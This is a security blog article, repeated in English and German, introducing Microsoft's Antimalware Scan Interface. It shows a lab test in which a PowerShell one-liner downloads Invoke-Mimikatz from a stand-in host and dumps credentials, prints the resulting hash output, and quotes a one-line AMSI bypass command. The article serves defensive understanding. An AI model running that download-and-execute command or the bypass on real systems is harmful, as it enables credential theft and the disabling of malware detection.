Microsoft Antimalware Scan Interface – an introduction to AMSI

Microsoft Antimalware Scan Interface

an introduction to AMSI

Michael Schneider
by Michael Schneider
on January 11, 2018
time to read: 7 minutes

Keypoints

  • AMSI stands for Antimalware Scan Interface
  • AMSI was introduced with Windows 10 and is implemented in Windows Defender
  • AMSI is an open interface that can be used by antivirus software makers
  • AMSI can be used to analyze dynamic scripting languages
  • Among other things, AMSI enables detection of known PowerShell malware

Script-based languages such as PowerShell, VBScript or JScript in Microsoft Windows are usually easy prey for hackers. These scripting languages are integrated into the operating system, have a powerful range of functions and are also used to perform legitimate tasks. As a result, PowerShell has become a popular tool for hackers, because it is very effective and was long considered hard to detect. Some antivirus solutions are now able to identify known PowerShell malware, although only scripts that are written to the hard disk are detected. Scripts that are executed directly from the memory are beyond the control of antivirus solutions. Microsoft’s introduction of the Antimalware Scan Interface (AMSI) is designed to change this.

What is AMSI?

Microsoft describes the Antimalware Scan Interface (AMSI) as a generic standard interface that allows application and services to interact with the antivirus solutions installed on the system. AMSI provides applications with the common techniques of an antivirus solution, such as scanning the hard drive and memory and analyzing content based on URL and IP address reputation checks. AMSI can also scan scripts that use tactics to conceal malicious code or layers of dynamic code. In the article Windows 10 to offer application developers new malware defenses, Microsoft software engineer Lee Holmes explains how the function then uses the AMSI API to scan the code when it is passed in plaintext form to the scripting engine. If, for example, a script uses Base64 encoding as a concealment tactic, AMSI performs the scan for potentially malicious code again after decoding the Base64 payload.

Microsoft’s native antivirus solution in Windows 10, Windows Defender, supports AMSI. Version 5 of PowerShell also includes support for AMSI. In Windows 10, the respective antivirus solution uses AMSI to scan the content of PowerShell script – provided the solution already uses AMSI.

AMSI in Action

We tested AMSI in our lab environment on Windows Server 2016. As a control experiment, Windows Defender was disabled and the PowerShell script Invoke-Mimikatz.ps1 was loaded from a web page and executed using Invoke-Expression:

PS C:\> Invoke-Expression ((New-Object Net.Webclient).DownloadString("https://malware.example.org/Invoke-Mimikatz.ps1")); Invoke-Mimikatz -Dumpcreds

  .#####.   mimikatz 2.1.1 (x64) built on Jul 20 2017 01:35:38
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 3360624 (00000000:00334770)
Session           : RemoteInteractive from 2
User Name         : adm_mreynolds
Domain            : LABS
Logon Server      : DC01
Logon Time        : 27.12.2017 08:07:24
SID               : S-1-5-21-3685327493-4069616680-3530608807-1105
        msv :
         [00000003] Primary
         * Username : adm_mreynolds
         * Domain   : LABS
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709		 
         * DPAPI    : 6667bd7c8c3dfef7a50b973a1acdec2d
        tspkg :
        wdigest :
         * Username : adm_mreynolds
         * Domain   : LABS
         * Password : (null)
        kerberos :
         * Username : adm_mreynolds
         * Domain   : LABS.SCIP.CH
         * Password : (null)
        ssp :
        credman :

As expected, Invoke-Mimikatz was executed without any trouble. Then Windows Defender was enabled and the test performed again. This time the execution failed and invoke Mimikatz was blocked by Windows Defender. The relevant event log entry indicates that AMSI is the source of the discovery:

Windows Defender has detected malware or other potentially unwanted software.
 For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:Win32/Mikatz!dha&threatid=2147706304&enterprise=0
    Name: HackTool:Win32/Mikatz!dha
    ID: 2147706304
    Severity: High
    Category: Tool
    Path: amsi:_PowerShell_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe_10.0.14393.00000000000000004
    Detection Origin: Unknown
    Detection Type: Concrete
    Detection Source: AMSI
    User: LABS\adm_hwashburne
    Process Name: Unknown
    Signature Version: AV: 1.259.809.0, AS: 1.259.809.0, NIS: 118.2.0.0
    Engine Version: AM: 1.1.14405.2, NIS: 2.1.14202.0

Before the introduction of AMSI, Windows Defender could detect Invoke-Mimikatz.ps1 only if the file was written to the disk. However, it was possible to subvert Windows Defender when executing it from the memory.

Getting around AMSI

As with any other security measure, there are also ways to get around AMSI. If, for example, PowerShell version 2 is executed on the respective system, the AMSI integration will be missing from PowerShell and the executable code is not scanned. Since AMSI also uses a signature-based approach, a significant change can potentially prevent discovery of detected malware scripts.

Another method is to disable AMSI with the PowerShell cmdlet Set-MpPreference; for example, as Nikhil Mittal explains in his presentation AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It. This disables Windows Defender’s real-time detection, an operation that requires administrator rights.

The command [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) disables AMSI for the current process. The AMSI bypass was discovered by Matt Graeber and does not require any administrative rights. In both cases, the executed operation or the deactivation is detected by monitoring the PowerShell and event logs.

Conclusion

Microsoft’s introduction of the Antimalware Scan Interface closes a gap that until now has been exploited by use of script-based languages. The combination of script block logging, Constrained Language Mode and AMSI allows PowerShell to be monitored and controlled in such a way that it is no longer lucrative for hackers. Microsoft has also included AMSI support in Office, so that macros can be scanned for known malware. AMSI provides a good way for application developers and makers of antivirus solutions to proactively prevent the spread of script-based malicious code in Windows.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

You want to bring your logging and monitoring to the next level?

Our experts will get in contact with you!

×
Farewell NTLM

Farewell NTLM

Michael Schneider

ContainerKitty

ContainerKitty

Michael Schneider

WebSockets

WebSockets

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Microsoft Antimalware Scan Interface - Einführung in die Funktionsweise von AMSI

Microsoft Antimalware Scan Interface

Einführung in die Funktionsweise von AMSI

Michael Schneider
von Michael Schneider
am 11. Januar 2018
Lesezeit: 7 Minuten

Keypoints

  • AMSI steht für Antimalware Scan Interface
  • AMSI wurde mit Windows 10 eingeführt und ist in Windows Defender implementiert
  • AMSI ist eine offene Schnittstelle, die von Antiviren-Herstellern genutzt werden kann
  • Mittels AMSI können dynamische Skript-Sprachen untersucht werden
  • Mit AMSI kann unter anderem bekannte PowerShell-Malware detektiert werden

Angreifer haben mit skriptbasierten Sprachen wie PowerShell, VBScript oder JScript unter Microsoft Windows meist ein leichtes Spiel. Die Skriptsprachen sind im Betriebssystem integriert, verfügen über einen mächtigen Funktionsumfang und werden auch für legitime Aufgaben genutzt. So hat sich PowerShell zu einem beliebten Werkzeug für Angreifer entwickelt, da es sehr effektiv ist und lange Zeit als schwer detektierbar galt. Einige Antiviren-Lösungen erkennen mittlerweile bekannte PowerShell-Malware. Dabei werden jedoch nur Skripte erkannt, die auf die Festplatte geschrieben werden. Skripte, die direkt aus dem Speicher ausgeführt werden, entziehen sich einer Kontrolle durch Antiviren-Lösungen. Mit der Einführung des Antimalware Scan Interface (AMSI) durch Microsoft soll sich dies ändern.

Was ist AMSI?

Microsoft beschreibt das Antimalware Scan Interface (AMSI) als ein generisches Standard-Interface, das es Anwendungen und Diensten ermöglicht mit der auf dem System installierten Antivirus-Lösungen zu interagieren. AMSI stellt Applikationen die gängigen Techniken einer Antivirus-Lösung zur Verfügung, wie zum Beispiel die Überprüfung von Festplatte und Speicher sowie Kontrolle von Inhalten basierend auf URL- und IP-Adressen-Reputationschecks. AMSI verfügt über die Fähigkeit auch Skripte zu untersuchen, die Verschleierungstaktiken oder Schichten von dynamischen Code verwenden. Im Artikel Windows 10 to offer application developers new malware defenses beschreibt Microsofts Software Engineer Lee Holmes diese Funktion so, dass die AMSI API dann eine Prüfung des Codes durchführt, wenn dieser in Klartext-Form an die Scripting-Engine übergeben wird. Wenn zum Beispiel ein Skript eine Verschleierung mittels Base64-Kodierung einsetzt, findet die Prüfung auf potentiellen Schadcode über AMSI nach der Dekodierung der Base64-Payload nochmals statt.

Microsoft selbst hat seine Antiviren-Lösung Windows Defender in Windows 10 mit AMSI-Unterstützung ausgestattet. Mit der Version 5 von PowerShell wurde der Support für AMSI ebenfalls eingeführt. Der Inhalt von PowerShell-Skripts wird unter Windows 10 mittels AMSI von der jeweiligen Antiviren-Lösung untersucht – vorausgesetzt diese setzt AMSI bereits ein.

AMSI im Einsatz

In unserer Lab-Umgebung haben wir AMSI unter Windows Server 2016 getestet. Als Kontrollversuch wurde Windows Defender deaktiviert, das PowerShell-Skript Invoke-Mimikatz.ps1 wird per Invoke-Expression von einer Webseite geladen und ausgeführt:

PS C:\> Invoke-Expression ((New-Object Net.Webclient).DownloadString("https://malware.example.org/Invoke-Mimikatz.ps1")); Invoke-Mimikatz -Dumpcreds

  .#####.   mimikatz 2.1.1 (x64) built on Jul 20 2017 01:35:38
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 3360624 (00000000:00334770)
Session           : RemoteInteractive from 2
User Name         : adm_mreynolds
Domain            : LABS
Logon Server      : DC01
Logon Time        : 27.12.2017 08:07:24
SID               : S-1-5-21-3685327493-4069616680-3530608807-1105
        msv :
         [00000003] Primary
         * Username : adm_mreynolds
         * Domain   : LABS
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709		 
         * DPAPI    : 6667bd7c8c3dfef7a50b973a1acdec2d
        tspkg :
        wdigest :
         * Username : adm_mreynolds
         * Domain   : LABS
         * Password : (null)
        kerberos :
         * Username : adm_mreynolds
         * Domain   : LABS.SCIP.CH
         * Password : (null)
        ssp :
        credman :

Wie es zu erwarten war, wird Invoke-Mimikatz ohne weiteres ausgeführt. Danach wurde Windows Defender eingeschaltet und der Versuch wiederholt. Diesmal schlug die Ausführung fehl und Invoke-Mimikatz wurde durch Windows Defender geblockt. Im entsprechenden Event-Log Eintrag ist als Quelle für die Entdeckung AMSI hinterlegt:

Windows Defender has detected malware or other potentially unwanted software.
 For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:Win32/Mikatz!dha&threatid=2147706304&enterprise=0
    Name: HackTool:Win32/Mikatz!dha
    ID: 2147706304
    Severity: High
    Category: Tool
    Path: amsi:_PowerShell_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe_10.0.14393.00000000000000004
    Detection Origin: Unknown
    Detection Type: Concrete
    Detection Source: AMSI
    User: LABS\adm_hwashburne
    Process Name: Unknown
    Signature Version: AV: 1.259.809.0, AS: 1.259.809.0, NIS: 118.2.0.0
    Engine Version: AM: 1.1.14405.2, NIS: 2.1.14202.0

Vor AMSI konnte Windows Defender Invoke-Mimikatz.ps1 nur dann erkennen, wenn die Datei auf die Festplatte geschrieben wurde. Windows Defender konnte jedoch durch die Ausführung im Speicher umgangen werden.

Umgehung von AMSI

Es gibt für AMSI wie für jede andere Sicherheitsvorkehrung auch Umgehungsmöglichkeiten. Wenn zum Beispiel auf dem jeweiligen System PowerShell in der Version 2 ausgeführt werden kann, fehlt die AMSI-Integration in PowerShell und der auszuführende Code wird nicht geprüft. Da AMSI auch unter anderem auf einem signaturbasierten Ansatz basiert, kann durch eine signifikante Änderung von erkannten Malware-Skripts die Entdeckung möglichweise verhindert werden.

Eine weitere Methode ist die Deaktivierung von AMSI, beispielsweise durch das PowerShell Cmdlet Set-MpPreference, wie Nikhil Mittal in seinem Vortrag AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It aufzeigt. Dabei wird die Echtzeit-Erkennung von Windows Defender deaktiviert, ein Vorgang der administrative Rechte erfordert.

Durch den Befehl [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) wird für den aktuellen Prozess die AMSI-Funktionalität entfernt. Der AMSI-Bypass wurde von Matt Graeber entdeckt und es sind keine administrativen Rechte dafür notwendig. In beiden Fällen kann die durchgeführte Operation respektive die Deaktivierung durch das Monitoring von PowerShell und Event Logs detektiert werden.

Fazit

Mit der Einführung des Antimalware Scan Interface bietet Microsoft Unterstützung für eine Lücke, die skriptbasierte Sprachen bis anhin ausnutzen konnten. Durch eine Kombination von Script Block Logging, Constrained Language Mode und AMSI kann PowerShell derart überwacht und kontrolliert werden, dass es für Angreifer nicht mehr attraktiv ist. Microsoft hat auch in Office eine Unterstützung für AMSI eingebaut, sodass Macros auf bekannte Schadsoftware untersucht werden kann. AMSI bietet eine gute Möglichkeit für Anwendungsentwickler und Hersteller von Antiviren-Lösungen unter Windows etwas gegen die Verbreitung von skriptbasierten Schadcode zu unternehmen.

Über den Autor

Michael Schneider

Michael Schneider arbeitet seit dem Jahr 2000 in der IT. Im Jahr 2010 hat er sich auf die Informationssicherheit spezialisiert. Zu seinen Aufgaben gehören das Penetration Testing, Hardening und das Aufspüren von Schwachstellen in Betriebssystemen. Er ist bekannt für eine Vielzahl in PowerShell geschrieber Tools zum Finden, Ausnutzen und Beheben von Schwachstellen. (ORCID 0000-0003-0772-9761)

Links

Sie wollen Ihr Log und Monitoring auf das nächste Level bringen?

Unsere Spezialisten kontaktieren Sie gern!

×
HardeningKitty

HardeningKitty

Michael Schneider

KleptoKitty

KleptoKitty

Michael Schneider

Linux Hardening

Linux Hardening

Michael Schneider

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv